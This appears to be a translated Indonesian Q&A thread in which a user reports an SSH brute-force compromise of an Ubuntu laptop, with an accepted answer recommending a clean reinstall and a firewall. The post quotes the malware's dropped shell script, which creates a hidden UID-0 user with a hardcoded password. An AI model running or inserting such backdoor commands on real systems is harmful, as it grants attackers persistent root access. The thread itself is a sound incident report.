Saya cukup yakin bahwa laptop Ubuntu 13.10 saya terinfeksi malware.
Sesekali, saya menemukan proses /lib/sshd (dimiliki oleh root) berjalan dan memakan banyak cpu. Bukan server sshd yang menjalankan /usr/sbin/sshd.
Biner memiliki izin –wxrw-rwt dan menghasilkan dan memunculkan skrip di direktori /lib. Yang terbaru bernama 13959730401387633604 dan melakukan hal berikut
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Pengguna gusr dibuat oleh malware secara independen, dan kemudian chpasswd hang saat menggunakan 100% cpu.
Sejauh ini, saya telah mengidentifikasi bahwa pengguna gusr ditambahkan ke file di /etc/
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Sepertinya malware membuat salinan semua file ini dengan akhiran "-". Daftar lengkap file /etc/ yang telah dimodifikasi oleh root tersedia di sini.
Selain itu, file /etc/hosts diubah menjadi ini.
/lib/sshd dimulai dengan menambahkan dirinya ke akhir file /etc/init.d/rc.local!
Saya telah menghapus pengguna, menghapus file, mematikan pohon yang diproses, mengubah kata sandi saya, dan menghapus kunci publik ssh.
Saya sadar bahwa saya pada dasarnya kacau, dan kemungkinan besar saya akan menginstal ulang seluruh sistem. Namun demikian, karena saya masuk ke beberapa mesin lain, akan lebih baik untuk setidaknya mencoba menghapusnya, dan mencari tahu bagaimana saya mendapatkannya. Setiap saran tentang cara melakukan ini akan dihargai.
Sepertinya mereka masuk pada 25 Maret dengan login root secara paksa. Saya tidak tahu bahwa root ssh diaktifkan secara default di Ubuntu. Saya menonaktifkannya dan memasang Denyhosts.
Loginnya dari 59.188.247.236, sepertinya di suatu tempat di Hong Kong.
Saya mendapatkan laptop dari EmperorLinux, dan mereka mengaktifkan akses root. Jika Anda memiliki salah satunya dan Anda menjalankan sshd, berhati-hatilah.
Jawaban yang Diterima:
Pertama, keluarkan mesin itu dari jaringan sekarang!
Kedua, mengapa Anda mengaktifkan akun root? Anda benar-benar tidak boleh mengaktifkan akun root kecuali Anda memiliki alasan yang sangat kuat untuk melakukannya.
Ketiga, ya, satu-satunya cara untuk memastikan Anda bersih adalah dengan melakukan instalasi bersih. Anda juga disarankan untuk memulai dari awal dan tidak kembali ke cadangan, karena Anda tidak akan pernah bisa memastikan kapan semuanya dimulai.
Terkait:Perintah untuk menentukan IP publik?Saya juga menyarankan agar Anda menyiapkan firewall di penginstalan berikutnya dan menolak semua koneksi masuk:
sudo ufw default deny incoming
lalu izinkan ssh dengan:
sudo ufw allow ssh
dan JANGAN aktifkan akun root! Tentu saja pastikan login root ssh dinonaktifkan.